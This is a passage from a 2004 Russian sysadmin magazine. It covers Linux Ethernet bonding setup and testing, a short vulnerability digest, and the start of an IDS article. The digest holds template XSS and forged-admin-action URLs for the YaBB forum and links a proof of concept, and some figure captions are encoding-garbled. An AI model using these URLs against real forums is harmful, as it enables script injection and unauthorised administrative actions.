Например, «шаблонность» нашего приложения остав-
ляет желать лучшего. Каждый добавляемый модуль в прин-
ципе имеет очень схожую структуру и функциональность.
То есть можно разработать один модуль-шаблон и настра-
процессе обращения к конкретной функции.
Можно сделать более гибкой систему разграничения до-
ступа, помимо пользователей введя понятие групп пользо-
вателей, а также разграничивая права пользователей в пре-
Механизм сессий используется очень слабо. Например,
его можно использовать для передачи таких параметров
как идентификатор пользователя (uid), вместо того чтобы
делать это с помощью скрытых полей формы. Не совсем
удобной выглядит необходимость в каждом модуле зада-
вать логин и пароль для подключения к БД. Выносить это в
модуль My::Insite неправильно (иначе будут сложности с
использованием данного модуля в других приложениях для
подключения к другим базам), а вот сделать что-то типа
конфигурационного файла и брать нужные данные оттуда
было бы намного лучше, поскольку в случае смены имени
или пароля корректировка потребуется только в одном ме-
сте. В существенном улучшении нуждается проверка кор-
ректности вводимых данных, контроль ошибок, и т. д. В ре-
альной жизни этим, конечно же, пренебрегать нельзя.
И вообще, можно сделать более удобный и красивый
дизайн, добавить страничкам «динамизм» с помощью
JavaScript (например, всплывающие подсказки, предупреж-
дения и т. п.) и много еще чего хорошего и полезного.
Заключение
Ну что ж. Надеюсь, полученный результат хотя бы частич-
но соответствует нашим ожиданиям, несмотря на множе-
ство недоработок, оставленных «за бортом». Мы получи-
ли гибкое, легко модифицируемое приложение, соответ-
ствующее большинству наших требований. В будущем его
без труда можно расширить, добавив, например, модуль
для работы с жалобами абонентов, для сбора статистики
по потребленному трафику и оплатам и т. д. Единствен-
ное, чего мне в данный момент не хватает, это красивых
отчетов, которые не стыдно было бы распечатать, сохра-
нить в файл, отправить по электронной почте. Эта задача
тоже решается довольно просто. Но об этом – в следую-
щей статье.
53
 сети
НА ПУТИ ПОВЫШЕНИЯ НАДЁЖНОСТИ
И СКОРОСТИ: LINUX BONDING
В данной статье описывается частный случай объединения двух каналов Ethernet в один
c помощью Linux bonding (на базе Red Hat v.7.3) как с целью повышения пропускной
способности, так и надёжности сетевого соединения.
Года два назад, просматривая одну электронную доску
объявлений в разделе б/у сетевого оборудования, я наткнул-
ся на заметку о продаже 16-портового коммутатора «Switch
Surecom EP-716X c поддержкой виртуальной сети и транка
на базе портов» плюс прочие документированные возмож-
ности. Цена была низкой, а желание повозиться с настрой-
ками велико. Поэтому я поспешил приобрести его.
Ðèñóíîê 1. Ôîòîãðàôèÿ êîììóòàòîðà Surecom EP-716X
Ситуация на рынке год от года не меняется, скорости
передачи данных неизменно растут, выходят новые версии
и т. д. Несмотря на рост скоростей в сетях с выделенным
сервером, узким местом все равно остаётся точка соеди-
нения сервера с локальной сетью. Если взять наиболее
часто используемый вариант, то используется сеть Fast
Ethernet и сетевые адаптеры с пропускной способностью
100 Мбит/с. В результате если к серверу обращается одно-
временно 20 компьютеров, то пропускная способность па-
дает до 5 Мбит/c, а за вычетом служебной информации ре-
альная пропускная способность оказывается ещё меньше.
Выход из данной ситуации может быть только один – уве-
личивать пропускную способность со стороны сервера. Если
на сервере в качестве делимого взять не 100, а 1000 Мбит/c,
то в теории средняя скорость передачи на один компьютер
должна увеличиться в 10 раз. Характеристики повсемест-
но продаваемого сетевого оборудования указывают на тот
факт, что развитие идёт именно в этом направлении. Од-
нако на данном пути есть несколько препятствий, не позво-
ляющих делать переход массовым и незаметным.
54
– Bond?....James Bond?
– No, Linux Bonding.
ПАВЕЛ ЗАКЛЯКОВ
Первый недостаток – необходимость покупки дорогих
коммутаторов с поддержкой нескольких или одного порта
по стандарту IEEE 802.3ab (1000Base-T). При этом старый
коммутатор оказывается не у дел.
Второй недостаток – необходимость замены кабельной
инфраструктуры. Кабели повсеместно используемых на
сегодня категорий 5 и 5e не подойдут по полосе пропуска-
ния, соответственно их придётся также менять.
Третий недостаток – сочетание сетевых карт стандарта
IEEE 802.3ab (1000Base-T) и шины PCI. С некоторой натяж-
кой можно считать, что цена данных устройств относитель-
но невелика. А вот пропускная способность шины PCI 2.0
может оказаться для нас недостаточной: 33 МГц ∗ 32 бита =
1056 Мбит/c [1]. Хотя, 1056 > 1000 следует понимать, что
различные накладные расходы, особенно для карт стоимо-
стью менее $25, приведут к тому, что реальная пропускная
способность окажется ниже 1000 Мбит/c. При большой заг-
рузке сети это приведёт к тому, что буфер не будет успе-
вать обрабатываться, возникнут потери пакетов. Как след-
ствие – повторная передача и ещё большее снижение про-
пускной способности. Также не следует упускать из виду,
что многие серверы часто имеют не одну сетевую карту, а
несколько.
Если согласно спецификации PCI 2.1 (и выше) вмес-
то тактовой частоты шины в 33 МГц использовать 66 МГц,
то подобных эффектов удастся избежать, однако в этом
случае возможны проблемы c другим оборудованием, не
поддерживающим частоту шины 66 МГц. Использование
PCI-X или 64-разрядной шины PCI (даже при тактовой ча-
стоте 32 МГц) решает проблему технически, но часто де-
лает её финансово непосильной. Материнские платы с
поддержкой 64-разрядной шины PCI уже относятся к сер-
верному классу и стоят соответствующе. «Склепать де-
шёвый сервер на коленке» не получится.
Единственный недорогой выход для данной ситуации –
это использование нескольких обычных сетевых карт. Зат-
раты при этом минимальны: $5 + один вечер и результат
усилий (удвоение пропускной способности) налицо. По это-
му пути я и пошёл.
Первое, что мне бросилось в глаза в описании, – это
была фраза: «Support Port-Base Trunking», интуитивно по-
няв, что это то, что мне нужно, я залез на веб-страницу
настройки и выставил одну транкинговую группу из 1-го и
9-го портов.

Ðèñóíîê 2. Ïîðòû 1 è 9 íàõîäÿòñÿ â ðåæèìå port trunking
(По непонятным для меня причинам, настройку транкин-
га портов с помощью протокола telnet разработчики поче-
му-то не сделали.) Далее я установил вторую карточку на
компьютер, подключаемый к коммутатору в качестве сер-
вера, соединил всё хозяйство патчкордами, и в результате
у меня получилась следующая схема соединений.
Ðèñóíîê 3. Ñõåìà ñîåäèíåíèé
Понимая, что само по себе железо работать не будет, я
занялся поисками литературы и настройкой программного
обеспечения. Основным документом, который частично по-
мог мне разобраться с проблемой, оказался Linux Ethernet
Bonding Driver mini-howto из комплектации ядра(v.2.4.27), на-
ходящийся по следующему пути: /usr/src/linux/Documentation/
networking/bonding.txt. В сети этот документ можно найти
по адресу [2]. Желая иметь монолитное ядро, я отказался
от рекомендаций компилировать Linux bonding в виде мо-
дуля. Всё бы хорошо, но объединение каналов почему-то
не работало как надо. При отключении кабелей от сетевых
интерфейсов ядро Linux продолжало думать, что всё в по-
рядке. Убедившись в правильности совета, я скомпилиро-
вал ядро повторно, выбрав «Bonding driver support» в каче-
стве модуля в разделе «Network device support».
Ðèñóíîê 4. Âûáîð «Bonding driver support» â êà÷åñòâå ìîäóëÿ
№10(23), октябрь 2004
сети
После компиляции ядра я зашёл в директорию, где на-
ходится исходный файл ifenslave.с:
# cd /usr/src/linux/Documentation/networking
и скомпилировал из него утилиту ifenslave (которая «под-
ключает» к общему интерфейсу bond0(bond1, ...) другие
подчинённые интерфейсы) командой:
# gcc -Wall -Wstrict-prototypes -O ↵
-I/usr/src/linux/include ifenslave.c -o ifenslave
Получившийся файл я скопировал в директорию /sbin:
# cp ifenslave /sbin/ifenslave
Для организации работы с модулем и передачи ему па-
раметров необходимо добавить следующие строчки в файл
/etc/modules.conf:
alias bond0 bonding
options bond0 miimon=100 mode=0 downdelay=2000 updelay=5000
Параметры, естественно, можно задать другие, но об
этом чуть позже. Чтобы было удобно воспользоваться стан-
дартной командой:
/etc/rc.d/init.d/network (start|stop|restart...)
а не вводить каждый раз параметры вручную через ifconfig,
следует создать следующие файлы (либо внести в них из-
менения, если файлы уже имеются):
/etc/sysconfig/network-scripts/ifcfg-bond0
DEVICE=bond0
IPADDR=192.168.0.1
NETMASK=255.255.255.0
NETWORK=192.168.0.0
BROADCAST=192.168.0.255
ONBOOT=yes
BOOTPROTO=none
USERCTL=no
/etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE=eth0
USERCTL=no
ONBOOT=yes
MASTER=bond0
SLAVE=yes
BOOTPROTO=none
/etc/sysconfig/network-scripts/ifcfg-eth1
DEVICE=eth1
USERCTL=no
ONBOOT=yes
MASTER=bond0
SLAVE=yes
BOOTPROTO=none
На случай, если ваша система будет себя вести иначе,
чем Red Hat v.7.3 и ему подобные, например, откажется по-
нимать параметр SLAVE и не «привяжет» интерфейсы eth0
и eth1 в качестве подчинённых к bond0, это можно сделать
руками с помощью следующих команд:
# /sbin/ifconfig bond0 192.168.0.1 ↵
netmask 255.255.255.0 broadcast 192.18.0.255 up
# /sbin/ifenslave bond0 eth0
55
 сети
# /sbin/ifenslave bond0 eth1
В случае возникновения проблем с настройкой нестан-
дартных конфигураций рекомендую обратиться к первоис-
точнику [2].
Теория. О режимах работы
Смысл организации объединённых каналов обычно очень
прост: либо нужно повышение пропускной способности,
либо увеличение надёжности, либо и то, и другое вместе.
Несмотря на то, что идеология построения объединённых
каналов относительно прозрачна, существует несколько
различных режимов совместной работы.
! Round robin, rr, 0. Круговой, основанный на последова-
тельном использовании подчинённых интерфейсов для
передачи через них пакетов в том порядке, как они были
подключены. В этом режиме интерфейсы наиболее рав-
номерно загружены.
! XOR, 2. Режим, в котором подчинённый интерфейс для
передачи конкретного пакета выбирается по формуле
«(src hw addr XOR dst hw addr) % slave», где «src hw addr»
и «dst hw addr» есть MAC-адреса отправителя и получа-
теля, приведённые к целочисленному виду, а slave – чис-
ло работающих подчинённых интерфейсов. Определе-
ние интерфейса для отправки пакетов напрямую зави-
сит от адреса получателя. При такой схеме выбора про-
исходит примерно равномерное распределение оппо-
нентов информационного обмена по интерфейсам с их
«виртуальной» взаимной привязкой друг к другу.
! Active-backup, 1. Режим горячей замены. В каждый мо-
мент времени работает только один интерфейс. Если
рабочий канал выходит из строя, то начинает использо-
ваться какой-либо один резервный интерфейс (из со-
подчинённых главному) взамен «отказавшего». Данный
режим используется в основном в системах повышен-
ной надёжности.
Диагностика: «жив ли link?»
Когда все связи активны и система работает, как это от
неё ожидается, может сложиться впечатление, что диагно-
стика не нужна. Однако не используя её постоянно в рабо-
чем режиме, сложно поймать тот момент, когда что-то пе-
рестало работать. Соответственно, можно пропустить мгно-
вение, когда нужно начать более активно использовать дру-
гие соподчинённые интерфейсы, полностью отказавшись
от сломанного. Если этого не сделать вовремя, то будет
большой процент потерь пакетов, далее увеличение числа
повторных передач и как следствие падение пропускной
способности ниже, чем если бы работал только один ин-
терфейс без настройки всяких linux bonding.
Существует два способа диагностирования (мониторин-
га) связанности:
! с помощью статуса Media Independent Interface (MII);
! c помощью ARP-запросов и ответов.
Несмотря на то что теоретически эти способы можно
использовать вместе, на практике они не совмещаются. Ви-
димо, разработчики этой части ядра сочли такую функцио-
нальность излишней. Расмотрим эти способы подробнее.
56
В первом случае небольшая схема на сетевой плате или
часть основной микросхемы отслеживают состояние подклю-
ченности и режима работы сети. Какая скорость – 10 или
100 Мбит/c? Полный ли дуплекс? Есть ли связь вообще или
нет? Эти данные с сетевой платы можно снимать и исполь-
зовать в благих целях. Для применения этого режима диаг-
ностики ваша карта должна поддерживать функцию мони-
торинга MII-статуса, и эта функция должна быть включена.
Часть ядра, отвечающая за bonding, исходя из этой инфор-
мации, может принимать решение о целесообразности ис-
пользования того или иного сетевого интерфейса для пере-
дачи данных. Дополнительно можно настроить периодич-
ность, с которой осуществляется проверка. Рекомендуется
использовать значение в 100 мс. Сильно уменьшать время
не следует, так как это будет в значительной мере загру-
жать систему. Увеличивать тоже особого смысла нет – мо-
жет привести к росту числа повторных передач пакетов.
Второй способ более медленный, зато более надёжный
и может работать с древними сетевыми картами, не под-
держивающими мониторинг на основе MII-статуса.
Для этого способа используется какой-либо отдельный
IP-адрес рабочего компьютера или адрес шлюза, которые
всегда должны быть в сети в рабочем состоянии. Периоди-
чески на этот адрес посылаются ARP-запросы, на которые
согласно требованиям, предъявляемым к хостам [5], долж-
ны отсылаться ARP-ответы. Если вдруг запросы перестали
уходить или перестали приходить ответы – значит пропала
связанность и канал следует исключить из использования
во избежание потери пакетов. Простой пример конфигура-
ции сети, где этот метод сработает лучше, чем мониторинг
MII-статуса, представлен на рисунке 5. Например, во вре-
мя переезда внутри здания некоторое устройство, ранее
сообщавшееся с сервером Linux напрямую двумя канала-
ми Ethernet, оказалось сильно отнесено (более чем на 180
метров). Благодаря особенностям организации сети,
Ethernet стало невозможным использование столь длинно-
го сегмента без ретрансляторов, в результате чего было
принято решение о применении двух коммутаторов посе-
редине с целью обеспечения связи устройства с сервером.
Сервер как работал в режиме объединения каналов с ди-
агностикой в виде мониторинга MII-статуса, так и продол-
жает работать. Теперь, если произойдёт сбой на участке,
отмеченном красным крестиком (между коммутатором 1 и
устройством) (см. рис. 5), сервер об этом не узнает. Так как
связь на участке «eth0 – коммутатор 1» есть, сервер будет
продолжать посылать по данному каналу пакеты, которые
будут успешно теряться на коммутаторе.
Если в данной схеме использовать мониторинг по ARP-
запросам и ответам, то, не получив ответа от устройства,
сервер поймёт, что связность в этом направлении наруше-
на и откажется от использования испорченного канала.
Ðèñóíîê 5. Ïðèìåð, ãäå ìîíèòîðèíã MII ñòàòóñà íåïðèìåíèì

Параметры, передаваемые модулю
Чуть выше без пояснений были выбраны следующие пара-
метры: miimon=100 mode=0 downdelay=2000 updelay=5000.
Давайте рассмотрим более подробно эти и другие парамет-
ры, с помощью которых можно менять режим работы.
mode
Параметр, выбирающий режим работы, возможные значения:
0,1,2 для Round robin, XOR, active backup соответственно.
miimon
Число мс (тип integer) – как часто производится монито-
ринг MII статуса. 0 – мониторинг отключен. Рекомендуемое
значение 100 мс.
downdelay
Задержка в мс (тип integer) с того момента, как было обна-
ружено, что связь пропала, до того, как данный канал пе-
рестанет использоваться. Задержка нужна, чтобы отфиль-
тровывать кратковременные сбои. Например, после пере-
ключения патчкорда в течение нескольких секунд совсем
не обязательно терять связь на минуту или больше. По умол-
чанию используется 0 – нет задержки.
updelay
То же самое, что и downdelay, но определяющее задержку
по включению, на тот случай, если какой-нибудь switch или
hub «не до конца включились». Напряжение на порт пода-
но, а пакеты ещё корректно не принимаются. Если в этот
момент передать данные – они потеряются, а если немного
подождать, то этого не случится.
arp_interval
С какой периодичностью в мс (тип integer) осуществлять
ARP-мониторинг. Значение 0 означает что ARP-мониторинг
выключен.
arp_ip_target
IP-адрес, по которому осуществлять ARP-мониторинг (в слу-
чае если arp_interval>0). Если с данного адреса нет ARP-
ответов, то значит канал, по которому посылались запро-
сы, не работает.
Linux bonding на практике
Как оказалось, практика расходится с теорией, и не всё у
меня работало так, как хотелось. Проводимые испытания и
результаты были следующими:
Была создана схема, указанная на рисунке 3, все связи
в ней целые.
Çàïóñêàåì íà 192.168.0.5: tcpdump icmp
Çàïóñêàåì íà 192.168.0.1: ping 192.168.0.2 -I bond0
Çàïóñêàåì íà 192.168.0.1 íà äðóãîé êîíñîëè: tcpdump icmp
Пакеты проходят нормально. Отсоединяем сетевой шнур
от eth0, и в /var/log/messages появляются строки:
Sep 22 17:55:19 LINUX2 kernel: bonding: bond0: link status down
for idle interface eth0, disabling it in 2000 ms.
Sep 22 17:55:21 LINUX2 kernel: bonding: bond0: link status definitely
down for interface eth0, disabling it
№10(23), октябрь 2004
сети
cat /proc/net/bonding/bond0 выводит:
Bonding Mode: load balancing (round-robin)
MII Status: up
MII Polling Interval (ms): 100
Up Delay (ms): 5000
Down Delay (ms): 2000
Slave Interface: eth0
MII Status: down
Link Failure Count: 1
Permanent HW addr: 00:50:22:e1:9e:3e
Slave Interface: eth1
MII Status: up
Link Failure Count: 0
Permanent HW addr: 00:02:44:8b:c9:c1
далее вставляем кабель обратно и наблюдаем в /var/log/
messages появление строк:
Sep 22 18:03:23 LINUX2 kernel: eth0: link up, 100Mbps, full-duplex,
lpa 0x45E1
Sep 22 18:03:23 LINUX2 kernel: bonding: bond0: link status up
for interface eth0, enabling it in 5000 ms.
Sep 22 18:03:28 LINUX2 kernel: bonding: bond0: link status definitely up
for interface eth0
/proc/net/bonding/bond0 соответственно для eth0 отобра-
жает:
MII Status: up
Повторим тест, но на этот раз отсоединяем кабель от eth1.
По идее должно быть всё то же самое, но, увы. С 192.168.0.1
ICMP-запросы уходят и доходят до 192.168.0.5, далее на них
отсылается ответ, о чём свидетельствует tcpdump, запущен-
ный на обеих машинах, а вот до 192.168.0.1 ответы уже не
доходят, теряясь где-то внутри коммутатора. Через некото-
рое время устаревает arp-таблица, и пакеты вообще пере-
стают уходить.
Переставляем патчкорды на коммутаторе местами и по-
вторяем ситуацию, ситуация с eth0 и eth1 меняется также
местами, из чего делаем вывод о плохой работоспособнос-
ти конкретного экземпляра Switch Surecom EP-716X. Как
результат тоже неплохо.
Попытки найти прошивку новее, чем v.1.3, как и выйти
на контакт с кем-то из техподдержки Surecom, не увенча-
лись успехом.
Однако это ещё не конец статьи. Мной было замечено,
что если два кабеля от eth0 и eth1 воткнуть в обычные пор-
ты этого или любого другого коммутатора либо отключить
port trunking у экземпляра выше, то объединение каналов
работает, но с небольшими оговорками.
В [2] рассмотрен такой случай, когда используется не-
сколько коммутаторов или один без поддержки port trunking,
однако там используется режим повышенной надёжности,
и одна из карточек стоит в горячем резерве (Active backup,
mode=1). При этом в одно и то же время обе карточки не
работают, чтобы не смущать коммутатор своими одинако-
выми MAC-адресами. Точнее, на одной из них установлен
флаг NOARP. И, естественно, ни о каком увеличении про-
пускной способности в 2 раза речь не идёт.
Испытания на обычном коммутаторе показали следую-
щую картину. Пакеты посылаются по обоим интерфейсам
поочерёдно. Обратно приходят также на два интерфейса
вразнобой. Выдвигаю гипотезу, что приходящий пакет ком-
мутатором посылается на последний работавший интер-
57
 сети
фейс. Если отключить один провод от сетевой карты, то
три исходящих пакета теряются, а далее связь восстанав-
ливается. Если отключить провод от другой сетевой карты,
ситуация почти аналогична – либо также теряются первые
три исходящих пакета, либо ничего не теряется. Объяснить
это можно тем, что подчинённые интерфейсы eth0 и eth1
не совсем равнозначны для bond0. Чем раньше подчинён-
ный интерфейс был подключён к общему, тем выше у него
приоритет. Если отключить самый приоритетный (в объе-
динённом канале может быть более двух подчинённых), то
роль первенства переходит другому интерфейсу, и тогда
теряется часть пакетов. Если отключить менее приоритет-
ный, то всё нормально. Каких-либо дополнительных про-
блем мною замечено не было. Возможно, сказалась малень-
кая нагрузка моей тестовой сети, состоящей из четырех ком-
пьютеров, хотя, думается, что и при большем числе ком-
пьютеров всё будет работать так же.
Ещё интересное наблюдение было сделано по резуль-
татам анализа tcpdump в разных точках. На 192.168.0.1 был
запущен ping, посылающий раз в секунду ICMP-запросы на
адрес 192.168.0.2.
tcpdump icmp -I eth0 на 192.168.0.1 перехватил следующее:
20:16:52.578951 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:16:54.578941 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:16:56.578950 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:16:58.578947 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:17:00.578945 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
tcpdump icmp -I eth1 на 192.168.0.1 перехватил следующее:
20:16:53.578947 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:16:55.578954 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:16:57.578951 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:16:59.578942 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:17:01.578948 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
tcpdump icmp -I bond0 на 192.168.0.1 перехватил следующее:
20:16:52.578933 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:16:52.579111 192.168.0.2 > 192.168.0.1: icmp: echo reply
20:16:53.578926 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:16:53.579106 192.168.0.2 > 192.168.0.1: icmp: echo reply
20:16:54.578921 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:16:54.579130 192.168.0.2 > 192.168.0.1: icmp: echo reply
20:16:55.578933 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:16:55.579142 192.168.0.2 > 192.168.0.1: icmp: echo reply
20:16:56.578928 192.168.0.1 > 192.168.0.2: icmp: echo request (DF)
20:16:56.579117 192.168.0.2 > 192.168.0.1: icmp: echo reply
...
Как легко заметить, исходящие пакеты чередуются с
выбором интерфейса. В 52, 54, 56, 58 секунд они уходят с
интерфейса eth0, а в 53, 55, 57, 59 – с интерфейса eth1.
При этом на интерфейсе bond0 их можно наблюдать вмес-
те в 52, 53, 54, 55 и т. д. секунд показывающими, что утили-
та ping действительно посылает раз в секунду ICMP-запро-
сы. Также забавно то, что на интерфейсе bond0 можно на-
блюдать и ICMP-ответы на посланные запросы, в то время
как на интерфейсах eth0 и eth1 их почему-то не видно, хотя
они реально приходят. Если включить мониторинг портов
на коммутаторе или поставить в разрыв провода мост, то
там видны все пакеты.
Я задал этот вопрос (почему не видны приходящие от-
веты на интерфейсах eth0 и eth1) Willy Tarreau <willy@
w.ods.org>, упомянутому в [2]. Он ответил, что это происхо-
дит потому, что модуль bonding работает на очень низком
уровне, ниже того места, где в обычном режиме цепляется
tcpdump.
58
Так как со стороны Linux, скорее всего, я настроил всё
правильно, то думаю, что проделанная работа кому-нибудь
пригодится. Возможно, окажись у меня под рукой другой
коммутатор, всё бы сразу заработало как надо. Если у кого-
то объединение портов работает нормально с другим обо-
рудованием (поддерживающим port trunking), буду рад об
этом услышать. Также мне интересно узнать, какие могут
возникнуть проблемы с обычными коммутаторами (не под-
держивающими объединение портов) и почему у меня они
не возникли.
Замечание 1. Никто не мешает организовать несколько
непересекающихся групп объединяемых каналов. При этом
необходимо загрузить модуль несколько раз, то есть в /etc/
modules.conf прописать две или более строчек вместо одной.
alias bond0 bonding
alias bond1 bonding
Ну и потом, при обращении к каждому модулю (обратите
внимание, что используются разные модули, а не один и тот
же под псевдонимами) передать каждому свои параметры.
options bond0 miimon=100
options bond1 -o bonding1 miimon=100
Замечание 2. Как я понял в процессе написания статьи,
терминов, обозначающих объединение каналов, много. Узнать,
почему их много и чем они отличаются, мне не удалось. Скла-
дывается впечатление, что каждая фирма хочет быть зако-
нодателем мод. Всего мне встретилось 5 вариантов:
! Aggregate link – в терминологии Intel;
! Port trunking – в терминологии D-link, 3Com, Surecom;
! Sun Trunking – в терминологии SUN;
! EtherChannel – в терминологии CISCO;
! Bonding – в терминологии Linux, FreeBSD.
Ещё мне встретился термин «load balancing», но это
немного другое, никакого отношения к объединённым ка-
налам не имеет. Сетевые карты не работают в паре на ка-
нальном уровне и имеют различные сетевые адреса, при
этом могут быть установлены на разных компьютерах.
Замечание 3. Идя по пути экономии, технологию объе-
динения каналов при желании можно использовать для
Gigabit Ethernet. Скорее всего, объединять будет выгоднее,
чем иметь один канал на 10 Гбит/c.
Литература, ссылки:
1. С.Мюллер Модернизация и ремонт ПК, 14-е издание.:
Пер. с англ. – М.: Издательский дом «Вильямс», 2003,
стр. 294.
2. Linux Ethernet Bonding Driver mini-howto
http://www.kernel.org/pub/linux/kernel/people/marcelo/
linux-2.4/Documentation/networking/bonding.txt
3. Реализация механизма Cisco Fast EtherChannel для
FreeBSD.
http://avdor.irkutsk.ru/faq/article.php?show_id=308
4. Bundling network interfaces with ng_one2many
http://unixpages.org/one2many_tut.html, http://bsdvault.net/
sections.php?op=viewarticle&artid=98
5. RFC 1127: A Perspective on the Host Requirements RFCs
ftp://ftp.rfc-editor.org/in-notes/rfc1127.txt

Удаленная перезапись памяти в PHP
Программа: PHP 5.0.1 и более ранние версии.
Опасность: средняя.
Описание: Уязвимость обнаружена в PHP, в обработке
MIME-данных. Уязвимость в обработке массивов обнару-
жена в SAPI_POST_HANDLER_FUNC() функции в rfc1867.c.
Удаленный пользователь может перезаписать элемент мас-
сива $_FILES.
URL производителя: http://www.php.net.
Решение: Исправление доступно через CVS: http://
cvs.php.net/php-src/main/rfc1867.c.
Обход ограничений и DoS-атака в MySQL
Программа: MySQL 3.23.
Опасность: средняя.
Описание: Обнаружено две уязвимости в СУБД MySQL.
Удаленный авторизованный пользователь может повысить
свои привилегии в БД или вызвать отказ в обслуживании.
URL производителя: http://www.mysql.com.
Решение: Установите обновление: http://www.mysql.com/
doc/en/Installing_source_tree.html.
Удаленное выполнение
произвольного кода в Icecast
Программа: Icecast 2.0.1 и более ранние версии.
Опасность: средняя.
Описание: Переполнение обнаружено в Icecast. Удаленный
пользователь может выполнить произвольный код на це-
левой системе.
Удаленный пользователь может представить HTTP-зап-
рос, содержащий более 32 строк заголовка, чтобы вызвать
переполнение буфера и выполнить произвольный код.
Пример: http://aluigi.altervista.org/poc/iceexec.zip.
URL производителя: http://www.icecast.org.
Решение: Установите обновленную версию программы:
http://www.icecast.org/download.php.
Переполнение буфера в обработке
JPEG-изображений в нескольких
продуктах Microsoft
Опасность: критическая.
Описание: Уязвимость обнаружена в нескольких продук-
тах Microsoft в обработке JPEG-изображений. Злонамерен-
ный пользователь может скомпрометировать систему
пользователя.
Переполнение буфера обнаружено внутри JPEG Parsing
компоненты (Gdiplus.dll). Злонамеренный пользователь
может сконструировать специально обработанное JPEG-
изображение, которое вызовет переполнение буфера при
попытке просмотреть это изображение, используя уязви-
мую компоненту. Уязвимость может использоваться для вы-
полнения произвольного кода на системе пользователя.
URL производителя: http://www.microsoft.com/technet/
security/bulletin/ms04-028.mspx.
Решение: Установите соответствующее обновление.
Microsoft также выпустила утилиту, которая позволяет оп-
ределить уязвимую компоненту на системе: http://
support.microsoft.com/default.aspx?scid=kb;EN-US;873374.
№10(23), октябрь 2004
bugtraq
Несколько уязвимостей
в Microsoft Windows
Опасность: критическая.
Описание: Несколько уязвимостей обнаружено в Microsoft
Windows. Злонамеренный пользователь может вызвать от-
каз в обслуживании, повысить привилегии или скомпроме-
тировать уязвимую систему.
Отсу тствие ограничений на нескольких Window
Management API-функциях позволяют злонамеренной про-
грамме изменить свойства других программ, запущенных
с более высокими привилегиями. В результате локальный
пользователь может изменить свойства привилегирован-
ного процесса.
Уязвимость в компоненте, используемой для обработ-
ки VDM (Virtual DOS Machine) подсистемы, позволяет полу-
чить доступ к защищенной памяти ядра. В результате зло-
намеренный локальный пользователь может получить
SYSTEM-привилегии через специально обработанную про-
грамму.
Переполнение буфера обнаружено в Graphics Rendering
Engine при обработке WMF (Windows Metafile) и EMF
(Enhanced Metafile) изображений. Злонамеренный пользо-
ватель может создать специально обработанное изображе-
ние, чтобы скомпрометировать систему целевого пользо-
вателя, открывшего это изображение или посетившего зло-
намеренный веб-сайт.
Злонамеренный пользователь может вызвать отказ в
обслуживании через специально обработанную программу,
эксплуатируя уязвимость в Windows-ядре.
URL производителя: http://www.Microsoft.com.
Решение: Установите соответствующее обновление.
Межсайтовый скриптинг и выполнение
административных действий
в форуме YaBB
Программа: YaBB 1 GOLD SP 1.3.2.
Опасность: средняя.
Описание: Две уязвимости обнаружены в YaBB. Злонаме-
ренный пользователь может выполнить XSS-нападение и
обойти некоторые ограничения безопасности.
XSS:
http://[victim]/YaBB.pl?board=;action=imsend;to=[code]
Злонамеренный пользователь может опубликовать со-
общение, содержащее изображение, которое ссылается на
URL, используемый при выполнении административных
действий. В результате административное действие будет
автоматически выполнено, когда администратор читает
сообщения форума. Пример:
http://[victim]/YaBB.pl?board=;action=modifycat; ↵
id=[cateogoryname];moda=Remove2
URL производителя: www.yabbforum.com.
Решение: Способов устранения обнаруженной уязвимос-
ти не существует в настоящее время.
Составил Александр Антипов
59
 безопасность
STAT – СОВСЕМ ДРУГАЯ IDS
Сегодняшний бизнес тяжело представить без использова-
ния Интернет и сетей TCP/IP. Доступ к необходимой инфор-
мации с любой точки планеты является несомненным удоб-
ством, стоит воспользоваться хоть раз, и уже не представ-
ляешь свой бизнес без этого. Но вместе с тем это несет и
свои проблемы. Сегодня основную нагрузку по защите се-
тей принимают на себя firewall и приложения уровня доме-
на, предназначенные для подтверждения подлинности поль-
зователей. Несмотря на то что эти приложения в основном
справляются со своей задачей, они не могут полностью ре-
шить все проблемы по защите сетей и отдельных хостов. И
как следствие, на помощь приходят системы обнаружения
атак (СОА или Intrusion detection systems – IDS). СОА, ана-
лизируя информацию относительно всех контролируемых
действий, выполненных в компьютерной системе или сети,
производят поиск доказательств злонамеренных действий.
Проверяемая информация может принимать форму конт-
60
СЕРГЕЙ ЯРЕМЧУК
рольных записей, произведенных средствами аудита опе-
рационной системы, записи в журналах приложений и раз-
личными типами датчиков, в том числе и трафик, получен-
ный прослушиванием сетевых интерфейсов. Одни систе-
мы, используя заранее составленные описания атак (сиг-
натуры) и сравнивая, принимают решения о начале атаки.
Такие IDS относятся к классу signature/rule-based/misuse и,
как правило, не могут обнаруживать новые, еще не зане-
сенные в базу атаки, что делает их бесполезными в начале
эпидемий, к тому же они склонны генерировать ложные по-
зитивные предупреждения. Другие, anomaly detection-сис-
темы, используют разные методы и алгоритмы, в которых
используются и контролируются модели «нормального»
поведения системы, основанные на статистических данных
или на некоторых правилах, отклонения от которых свиде-
тельствуют о возможных неприятностях. Такие системы,
хоть также обладают недостатками, так как требуется не-

которое время на их обучение, которое к тому же при неко-
торых обстоятельствах может быть и не 100% эффектив-
ным. Они все же позволяют обнаруживать новые атаки, но
также не застрахованы от выдачи ложных тревог, особен-
но в динамичных средах. Скорее всего, в ближайшем буду-
щем будут использоваться комбинированные системы, со-
четающие в себе положительные свойства обеих систем.
За примером далеко ходить не надо – Snort (http://
www.snort.org) поддерживает проверку аномалий в сети
посредством препроцессоров (preprocessors). Препроцес-
соры проверяют данные пакетов после декодера Snort, но
до того как механизм детектирования начинает сравнивать
правила, добавляя дополнительные возможности всей си-
стеме. Хотя в сильно загруженных сетях их применение
может увеличить нагрузку на систему, и к тому же большая
их часть находится в концептуальном состоянии, и они мо-
гут вызывать большое количество ложных срабатываний,
но, надо отметить, возможна тонкая подстройка препроцес-
